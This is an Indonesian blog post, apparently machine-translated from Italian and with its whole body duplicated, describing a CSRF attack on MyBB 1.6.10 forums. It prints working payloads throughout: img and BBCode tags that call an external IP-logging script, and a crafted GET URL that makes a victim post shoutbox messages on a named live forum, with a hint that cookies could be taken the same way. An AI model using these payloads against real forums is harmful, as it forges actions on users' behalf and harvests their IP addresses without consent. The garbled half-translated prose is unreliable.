• Beranda
  • Autosultan
  • Bitcoin
  • Dollar
  • Linux
  • LOKER
  • Printer
  • Sofware
  • sosial
  • TISniper
  • Virus
  • Windows

T.I Sniper

#Expert Advisor for MetaTrader 4 #Expert Advisor for MetaTrader 5 #youtube #google #free dollar business every day #Lowongan #Pekerjaan #Loker #forex #trading Autopilot #mining crypto #Update #Tutorial #Komputer Perbaikan, #Email #Facebook , #whatsapp ,#instagram #telegram ,#Internet ,#Motivasi , #Crypto , #AirDrop, #Bitcoin, #Ethereum, #Binance coin, #Cardano, #Degocoin, #Litecoin #Indodax, #Coinbase, #Nexo Dan Mata Uang Digital Lain , #Website, Perbaikan #Server #Domain , #Hosting, #Whm

    • Beranda
    • Contact Forum
    • Coffee JKs88
    • Tentang Kami
    • Parse Code Html
    • Text Terbalik
    • Privacy Policy

    Ikuti Kami!

    Follow Akun Instagram Kami Dapatkan Notifikasi Terbaru!
    Ikuti Kami di Facebok! Untuk mendapatkan notifikasi terbaru.

    Postingan Populer

    Backlink dengan Google Dork Seo

    Dork Seo
    Januari 01, 2016
    0

    Cara Dapat Backlink dengan Google Dork

    Dork Seo
    Februari 13, 2016
    0

    Cara Dapat Backlink Edu Gratis

    Seo
    Februari 13, 2016
    0

    Download File ISO Windows 11 Dan Bootable USB Rufus

    Sofware Windows
    Desember 02, 2021
    0

    FORUM 

    FORUM
    Desember 31, 2021
    0
    Author
    chmood
    Tautan disalin ke papan klip!
    Share Posts "Exploit (?) CSRF MyBB 1.6.10"
  • Salin link
  • Simpan Ke Daftar Bacaan
  • Bagikan ke Facebook
  • Bagikan ke Twitter
  • Bagikan ke Pinterest
  • Bagikan ke Telegram
  • Bagikan ke Whatsapp
  • Bagikan ke Tumblr
  • Bagikan ke Line
  • Bagikan ke Email
  • HomeDefaceExploitationsParrotExploit (?) CSRF MyBB 1.6.10
    Exploit (?) CSRF MyBB 1.6.10

    Exploit (?) CSRF MyBB 1.6.10

    Simpan Postingan


    Exploit (?) Mungkin.

    Pagi Tadi Nadya and teman Nadya  tidak tahu apa yang harus dilakukan, jadi s4ya mengatakan:
    "Mengapa tidak membuat lelucon dari saya dalam gerhana dan Gi0ve?"
    (Saya dengan rendah hati meminta maaf) Jadi saya mencoba untuk menjelajah beberapa kerentanan XSS dan CSRF.Questa adalah Pemalsuan Permintaan Cross Site (CSRF), yaitu, untuk membuat korban permintaan ke halaman tertentu atau situs intenzionalmente.Come tidak bekerja?
    Dalam hal ini saya menggunakan lapangan
    <Img src = "">
    Banyak CMS dan Web situs benar-benar tidak mengontrol isi dari src.
    Jika MyBB, Anda tidak dapat menyuntikkan javascript atau vbscript
    (Es)

    <Img src = "javascript: alert (/ XSS /)" />
    dan sehingga Anda tidak dapat membuat XSS, namun diperbolehkan untuk melakukan permintaan GET ke CMS atau server eksternal.

    Saya mulai menguji CSRF hanya dengan

    <Img src = "http://thezero.it/ips.php" />
    Dan poof! inilah IP yang menampilkan gambar: http://thezero.it/ips.txt

    Dan selain ip logging bisa banyak hal lain (yang mengatakan Biskuit? [Cookie?]).

    Tapi kembali ke 'CRF.

    Aku tidak ingin melakukan banyak kekacauan jadi saya pikir untuk menulis pesan di ShoutBox.

    Saya mencoba untuk menulis pesan di ShoutBox dan saya melihat jenis permintaan ke server

    Dua permintaan pada http://forum.frozenbox.org/xmlhttp.php
    Sebuah POST dengan parameter pesan shout_data
    GET dengan tindakan query = add_shout

    Untuk GET tidak ada masalah, hanya parameterisasi URL sebagai berikut

    http://forum.frozenbox.org/xmlhttp.php?action=add_shout
    Tapi tidak ada tempat untuk POST. (CSRF di quesitone hanya menerima GET parameter)

    Jadi, kami mencoba untuk mengubah parameter POST dalam parameter GET.
    CATATAN: Bagi mereka yang tahu PHP, jika server ditafsirkan $ _REQUEST tidak peduli jenis permintaan (GET, POST atau COOKIE), maka akan diterima pula.

    Mengubah permintaan POST untuk GET link menjadi:

    http://forum.frozenbox.org/xmlhttp.php?action=add_shout&shout_data=
    Dimana setelah tanda sama akan memasukkan pesan untuk menulis di ShoutBox.

    misalnya:

    <Img src = "http://forum.frozenbox.org/xmlhttp.php?action=add_shout&shout_data=Messaggio" />
    CATATAN: Eksploitasi Hanya bekerja melalui MP, di pos diskusi tidak ditafsirkan HTML, (?)
    Tetapi dengan beberapa perubahan yang kami dapat menggunakan ini:
    (BB Code, bermain hampir di mana saja di forum.)

    [Img] http://thezero.it/ips.php [/ img]
    Berikut adalah cara untuk menampilkan gambar korban:
    [Gambar: ips.php]

    HARAP, JANGAN pisau pada IT.



    - (?) TheZeroExploit CSRF MyBB 1.6.10

    Exploit (?) Mungkin.
    Pagi ini saya tidak tahu apa yang harus dilakukan, jadi saya mengatakan:
    "Mengapa tidak membuat lelucon dari saya dalam gerhana dan Gi0ve?"
    (Saya dengan rendah hati meminta maaf) Jadi saya mencoba untuk menjelajah beberapa kerentanan XSS dan CSRF.Questa adalah Pemalsuan Permintaan Cross Site (CSRF), yaitu, untuk membuat korban permintaan ke halaman tertentu atau situs intenzionalmente.Come tidak bekerja?
    Dalam hal ini saya menggunakan lapangan
    <Img src = "">
    Banyak CMS dan Web situs benar-benar tidak mengontrol isi dari src.
    Jika MyBB, Anda tidak dapat menyuntikkan javascript atau vbscript
    (Es)

    <Img src = "javascript: alert (/ XSS /)" />
    dan sehingga Anda tidak dapat membuat XSS, namun diperbolehkan untuk melakukan permintaan GET ke CMS atau server eksternal.

    Saya mulai menguji CSRF hanya dengan

    <Img src = "http://thezero.it/ips.php" />
    Dan poof! inilah IP yang menampilkan gambar: http://thezero.it/ips.txt

    Dan selain ip logging bisa banyak hal lain (yang mengatakan Biskuit? [Cookie?]).

    Tapi kembali ke 'CRF.

    Aku tidak ingin melakukan banyak kekacauan jadi saya pikir untuk menulis pesan di ShoutBox.

    Saya mencoba untuk menulis pesan di ShoutBox dan saya melihat jenis permintaan ke server

    Dua permintaan pada http://forum.frozenbox.org/xmlhttp.php
    Sebuah POST dengan parameter pesan shout_data
    GET dengan tindakan query = add_shout

    Untuk GET tidak ada masalah, hanya parameterisasi URL sebagai berikut

    http://forum.frozenbox.org/xmlhttp.php?action=add_shout
    Tapi tidak ada tempat untuk POST. (CSRF di quesitone hanya menerima GET parameter)

    Jadi, kami mencoba untuk mengubah parameter POST dalam parameter GET.
    CATATAN: Bagi mereka yang tahu PHP, jika server ditafsirkan $ _REQUEST tidak peduli jenis permintaan (GET, POST atau COOKIE), maka akan diterima pula.

    Mengubah permintaan POST untuk GET link menjadi:

    http://forum.frozenbox.org/xmlhttp.php?action=add_shout&shout_data=
    Dimana setelah tanda sama akan memasukkan pesan untuk menulis di ShoutBox.

    misalnya:

    <Img src = "http://forum.frozenbox.org/xmlhttp.php?action=add_shout&shout_data=Messaggio" />
    CATATAN: Eksploitasi Hanya bekerja melalui MP, di pos diskusi tidak ditafsirkan HTML, (?)
    Tetapi dengan beberapa perubahan yang kami dapat menggunakan ini:
    (BB Code, bermain hampir di mana saja di forum.)

    [Img] http://thezero.it/ips.php [/ img]
    Berikut adalah cara untuk menampilkan gambar korban:
    [Gambar: ips.php]

    HARAP, JANGAN Jadikan pisau pada IT.



    - TheZero_Sniper-


    Deface Exploitations Parrot
    Oktober 21, 2015 • 0 komentar
    Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.
    Isi dari komentar adalah tanggung jawab dari pengirim. T.I Sniper mempunyai hak untuk tidak memperlihatkan komentar yang tidak etis atau kasar. Jika ada komentar yang melanggar aturan ini, tolong dilaporkan.

    T.I Sniper

    Your description here

    • Follow
    • Autosultan
    • Wa Admin Bisnis
    Copyright ©2010 - 2022 🔥 T.I Sniper.
    • Beranda
    • Cari
    • Posting
    • Trending
    • Tersimpan